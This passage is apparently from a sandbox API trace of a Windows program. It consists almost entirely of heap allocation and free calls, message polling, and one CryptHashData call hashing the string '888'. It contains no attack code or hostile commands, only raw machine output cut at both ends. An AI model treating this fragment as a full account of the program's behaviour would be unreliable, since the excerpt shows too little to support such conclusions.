phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0258.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0258.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0258.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0258.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0258.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54eb8 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0258.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54dd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0258.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0258.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0258.902] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0258.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0258.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0258.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0258.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0258.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e513a0 [0258.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0258.905] CryptHashData (hHash=0xa87250, pbData=0x2e54dd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0258.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0258.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.906] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0258.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0258.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0258.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0258.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0258.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0258.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0258.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0258.907] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0258.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0258.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0258.908] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 